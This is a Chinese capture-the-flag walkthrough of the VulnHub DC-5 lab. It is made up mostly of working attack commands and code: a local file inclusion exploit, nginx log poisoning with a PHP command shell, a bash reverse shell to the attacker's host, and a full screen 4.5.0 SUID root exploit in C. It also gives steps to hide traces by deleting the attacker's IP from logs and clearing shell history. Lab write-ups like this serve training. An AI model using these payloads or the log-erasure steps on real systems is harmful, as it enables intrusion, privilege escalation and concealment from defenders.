vulnhub靶场【DC系列】之5

媒介

靶机：DC-5，IP地址为192.168.10.4
攻击：kali，IP地址为192.168.10.2
都接纳VMWare，网卡为桥接模式
   对于文章中涉及到的靶场以及工具，我放置网盘中https://pan.quark.cn/s/2fcf53ade985
  主机发现

使用arp-scan -l大概netdiscover -r 192.168.10.1/24

信息收集

使用nmap扫描端口

网站信息探测

访问80端口默认界面，查看页面源代码，发现脚本语言为php

使用gobuster、dirsearch、ffuf、dirb、dirbuster等工具对目的进行目录爆破

1. gobuster dir -u http://192.168.10.4 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,md -d -b 404

复制代码

漏洞寻找

既然是php文件，并且当前也没有什么可用，那么使用ffuf对这些php脚本文件进行模糊测试，测试有无一些隐藏的参数，知道几个的php文件，往返进行一个测试，最终在thankyou.php发现

1. ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://192.168.10.4/thankyou.php?FUZZ=./contact.php -fs 852
2. #FUZZ是前面字典的测试点，也就是测试参数
3. #FUZZ后面的是已知的网站php文件，如果存在文件包含等，可能就会显示
4. #-fs是过滤该字节大小的数据，也就是原始的thankyou.php的数据大小

复制代码

发现参数file，那么再测试有什么可注入点，通过这个参数

1. ffuf -c -w /usr/share/wordlists/wfuzz/Injections/All_attack.txt -u http://192.168.10.4/thankyou.php?file=FUZZ -fs 835
2. #-fs后面的数据变化了，是因为数据大小发生变化，在有file参数后，原始的大小变为835

复制代码

通过构造链接，获取/etc/passwd文件，发现靶机内有一个用户dc

但是这里没有办法获取/etc/shadow文件，所以继续寻找其他点，尝试使用从github上获取的字典，继续进行测试

1. ffuf -c -w /usr/share/wordlists/linux_file.txt -u http://192.168.10.4/thankyou.php?file=FUZZ -fs 835

复制代码

漏洞利用

但是这里访问一圈，没有获取到有效信息。
这时候去前面看了一下nmap的扫描， 想起这里的网站使用的是nginx，偏偏使用的字典没有包括这个，这里就手动输入
路径作用/etc/nginx/nginx.conf主设置文件/var/log/nginx/access.log访问日志设置，它将访问日志记录/var/log/nginx/error.log记录 Nginx 服务器在运行过程中出现的各种错误信息 颠末测试，日志文件error.log会记录信息，但是access.log并无记录信息
既然是错误的日志，那么就尝试给予一个传参的值为php代码，然后进行测试
先传入简单的代码进行测试<?php system('id');?>

1. http://192.168.10.4/thankyou.php?file=<?php system('id');>

复制代码

访问记录错误的日志文件，发现此中的代码被进行url编码了
访问链接，最好以查看源代码的情势，不然容易出错，大概看不清

1. view-source:http://192.168.10.4/thankyou.php?file=/var/log/nginx/error.log

复制代码

那么尝试使用burp进行抓取数据包，测试其在哪个阶段进行的url编码，发现是在到服务器之前进行的编码，那么可以在burp中修改，并且，还是有可能注入的

啧，这里靶机出了问题，再访问error.log没有任何信息，所以无奈之下，重装靶机，可能之前进行爆破的时候，太多导致的
这时候把编码的代码进行复原，然后进行转发

再次访问access.log，这里为什么是access.log不是error.log了呢，由于重装后，好了，access.log有数据了，不过访问error.log也是可以看到数据的
访问access.log的效果如下

1. view-source:http://192.168.10.4/thankyou.php?file=/var/log/nginx/access.log

复制代码

访问error.log的效果如下

1. view-source:http://192.168.10.4/thankyou.php?file=/var/log/nginx/error.log

复制代码

而且说白了，在进行构造时，参数是不是file都行，只要在进行查看，也就是文件包罗时，使用即可
这里确定可以实行php代码，那么就尝试设置一个参数，来进行命令实行
构造代码<?php system($_REQUEST['cmd']);?>，然后再次通过burp改包后转发

然后在欣赏器上访问，这时候就需要构造链接了

1. view-source:http://192.168.10.4/thankyou.php?file=/var/log/nginx/access.log
2. &cmd=ls

复制代码

反弹shell

cmd用于接收用户的输入，然后调用system函数实行，也就相称于命令实行了
尝试通过这样构造一个bash反弹

1. /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.10.2/9999 0>&1'
3. #进行URL编码后
4. %2fbin%2fbash+-c+%27%2fbin%2fbash+-i+%3e%26+%2fdev%2ftcp%2f192.168.10.2%2f9999+0%3e%261%27

复制代码

把URL编码后的语句传参给cmd，就可以获取到一个反弹shell

在查看当前靶机内用户，发现只要dc，并且此中的目录下，并没有任何文件，个人感觉，可能都不需要提权至dc了
使用find寻找具有SUID权限的文件，啧，发现exim4文件，是不是很眼熟，由于这个和上个靶机很像，就是不知道版本是否一致

提权

测试发现exim4的版本为4.84-2，在使用searchsploit未对应版本，也未在范围内

1. searchsploit exim 4.8 privilege

复制代码

不过发现一个不常见的命令screen-4.5.0
使用searchsploit搜刮，发现有该版本的提权脚本

1. searchsploit screen 4.5.0

复制代码

使用locate定位到文件的位置，然后为了方便复制到当前目录下的位置，然后查看脚本文件内容，发现涉及到gcc编译

那么测试靶机内有无情况，就是有无安装gcc，并且能否使用wget

不过在实行脚本后，直接出错，不过观察脚本，按理说，应该是可以进行创建等操纵的，既然在靶机内无法直接实行脚本，那么就把脚本中的内容进行分段处置惩罚，这里就是三部门，两个c文件，然后尚有编译的操纵命令。
   注意，我这里由于出现失误，所以后续的代码编辑，文件名称会改变，不过效果不变

1. //第一部分的c文件
2. //下面代码存放在 /tmp/libhax.c
4. #include <stdio.h>
5. #include <sys/types.h>
6. #include <unistd.h>
7. __attribute__ ((__constructor__))
8. void dropshell(void){
9.     chown("/tmp/shell", 0, 0);
10.     chmod("/tmp/shell", 04755);
11.     unlink("/etc/ld.so.preload");
12.     printf("[+] done!\n");
13. }
16. //执行下面的命令
17. gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
18. rm -f /tmp/libhax.c

复制代码

然后创建第二个

1. //第二部分的c文件
3. #include <stdio.h>
4. int main(void){
5.     setuid(0);
6.     setgid(0);
7.     seteuid(0);
8.     setegid(0);
9.     execvp("/bin/sh", NULL, NULL);
10. }
13. //执行下面的命令
14. gcc -o /tmp/shell /tmp/shell.c
15. rm -f /tmp/shell.c

复制代码

然后创建一个脚本文件，大概这里的命令，一个个去实行也是可以的

1. cd /etc
2. umask 000 # because
3. screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
4. echo "[+] Triggering..."
5. screen -ls # screen itself is setuid, so...
6. /tmp/shell  

复制代码

由于靶机内文件编译器有问题，所以这里把两个c文件以及脚本文件编写好，然后通过python，靶机使用wget下载到/tmp目录。
不过在靶机使用gcc编译出现以下问题时，设置以下临时情况变量即可

1. #报错信息
2. gcc: error trying to exec 'cc1': execvp: No such file or directory

复制代码

可以使用临时情况变量设置，一般的gcc关键目录可能都在这个

1. export PATH=$PATH:/usr/local/bin/

复制代码

这时候再按照两个c文件对应的gcc编译命令，然后就可以编译成功

实行脚本文件，即可发现提权成功

查看flag

打扫陈迹

这里必须要说一下，由于这次对于nginx的日志都已经出现问题了，所以肯定有大量的记录

1. sed -i "/192.168.10.2/d" /var/log/nginx/access.log
2. sed -i "/192.168.10.2/d" /var/log/nginx/error.log

复制代码

对于其他的日志，直接置空大概怎么样都行
历史命令清理

1. history -r
2. history -c

复制代码

总结

该靶场重要考察以下几点：

• 对于网站只有由php语言编写的时候，要测试有无隐藏的参数，大概这个参数具有文件包罗功能，甚至可能会有远程的文件包罗
  
• 对于常见的几种web中间件的设置文件的了解，这里是考察nginx的日志文件，并通过该日志文件触发php代码，以达到文件包罗+命令实行的效果
  
• 反弹shell的构造，这里太多了，靶机支持的情况下，可以百度测试，这里提供一个地址https://forum.ywhack.com/shell.php
  
• 对于提权操纵，搜刮具有SUID权限的文件后，可以查看文件是否具有版本漏洞，可以借助searchsploit，然后以及靶机内信息收集来确定版本，以确定是否具有漏洞，这里忘了截图uname -a这里可以看到为GNU系统
  

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。